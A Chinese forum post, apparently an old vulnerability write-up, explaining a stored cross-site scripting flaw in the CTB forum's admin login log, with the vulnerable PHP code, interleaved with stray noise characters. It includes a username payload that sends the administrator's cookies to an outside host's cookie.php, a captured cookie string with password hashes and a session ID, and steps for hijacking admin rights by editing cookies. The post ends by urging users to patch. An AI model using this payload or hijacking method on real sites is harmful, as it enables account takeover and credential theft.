- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
|
在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。 R% g9 g/ l1 u% a) S% }
: x6 d8 i( i0 T7 M: a" |$ [
我们看看admin目录下的login.php文件的日志处理部分的代码: , S0 Z' h9 ~& i& W5 J6 M
. |+ B3 o# ^5 l# o6 ?
代码:
! T N: r' o; u ?-------------------------------------------------------------------------------- 8 J6 |# z5 y( p
; F g% u: V/ {/ q. i
//后台管理员登陆日志
0 r6 C4 h% ]0 q8 }$ {function adminLoginLog($check="ok")
1 z8 o" j$ G$ u2 m{
) Z, b, y/ k3 o3 j. Z if($this->set[logRecord] == "N"){
9 a \* }6 Z; d% N1 i return false;
1 V& T0 P6 h* |8 ~9 m' f' y }
3 Q9 v# O4 E8 C! K- V0 W $msgArray[phpCode] = $this->code;
i4 G* i# l, |7 Z; d' I4 k //判断文件大小是否需要清空 / Y) |% ~' W( m" A k) d; X; ? h0 {' v
if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ : o3 E1 S+ T" T8 X' B
$this->file = "../".$this->set['dataPath']."/log_adminlogin.php";
?1 X9 f2 z/ s; D% } $this->null_write("");
6 O3 R7 a* L' _: @ } ' n' l# r4 h3 `/ o6 y8 S0 l; f+ V
//登陆错误 9 w0 z# w+ Z* b9 D3 |
//省去部分代码........ $ _9 C' K" j$ w: R( Z
//登陆失败 0 n% \0 c- o) T o S
else { " I3 x# T6 K8 ~* d
$msgArray[loginMode] = 0;
8 p, ^; w- A" [* Y# D* n p $msgArray[loginId] = $this->input['userName'];
3 n; T+ T$ k2 `) v $msgArray[wrongMsg] = $check; 8 @* M$ q) t7 ^9 ~8 {+ [2 C
$msgArray[userIp] = $this->ip;
# q9 }. ]8 t" s+ A0 R: j $msgArray[loginTime] = time(); * f* @; ?7 M2 Q6 c. [
$msgArray[temp1] = ""; //备用
0 D2 G2 O. |# V, K# x9 x3 u $msgArray[temp2] = ""; //备用
7 _1 r( c" t1 Y- D/ P $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; * M- A4 w0 O) y: X* l- R- X8 n
$this->add_line($msgArray); 2 D: |7 E2 g* i1 a: J% o
}
& H$ F0 H7 H) V; Q( P} / }7 y% i4 Z( |& q) i
# F& j$ y! Z# h: m( w. h
--------------------------------------------------------------------------------
% h- J, u- w) F5 u$ i. ^" v) ?/ U+ r( S0 ^
从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个方法来得到管理员的ID和密码等信息。
6 ?' D t; L! Q. ~* U1 Q: ]9 I \9 I g5 r
我们打开后台登陆页面,在用户名那里输入:
- F6 m3 e2 @: X
# L. I) c( b T代码:
5 ?& I* P2 w: L) k$ o$ \--------------------------------------------------------------------------------
$ I, I# a% P. ^$ P- ^6 y! T7 n, S0 n4 ~1 A2 L
<img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)">
7 d4 ^7 s' @1 {. [" C( _
+ Y: p$ L/ [5 l9 X- t2 X--------------------------------------------------------------------------------
?% C! b# y( H6 I# |
* O8 B! ^ N6 o8 S& A+ i0 _7 D7 z8 S 因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。
) w; V- n$ \. T* y! d6 j- ~
+ S- y+ r4 R- k+ I6 L 让我们看看截取到的文件内容:
* u& ~. X& `5 I/ n# @# i0 h. a+ e
* t. x B( Q1 p, {7 O' |; N引用:
8 F+ Q% |( s. B& B2 K4 b' H( K-------------------------------------------------------------------------------- : e Q' o& l7 ]4 A6 b% D5 _
" Q+ P4 A. I5 O: b) M$ xctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503 7 j: `; @( Q0 ^4 F' R# c
7 e/ z# a& R" l" ?1 W
-------------------------------------------------------------------------------- 3 G! t" A) q3 f. L
0 K% u9 \" B" ~, o9 p
我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。
! a* r6 @" r# w1 i T/ `! ~) r) b" m0 C4 p: S- ]
很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。
8 z3 s0 U3 o* G |
zan
|